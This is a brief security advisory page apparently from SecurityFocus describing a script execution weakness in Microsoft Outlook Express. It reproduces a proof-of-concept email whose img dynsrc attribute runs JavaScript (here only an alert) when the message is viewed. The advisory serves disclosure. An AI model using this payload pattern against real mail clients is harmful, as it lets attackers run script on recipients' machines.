Microsoft Outlook Express Script Execution Weakness

The following proof-of-concept message was posted to demonstrate the weakness:

MIME-Version: 1.0
Content-Type: text/plain;
Content-Transfer-Encoding: 7bit
X-Source: 25.07.03 http://www.malware.com

<img dynsrc=javascript:alert()><font color=red>foo


 

Privacy Statement
Copyright 2010, SecurityFocus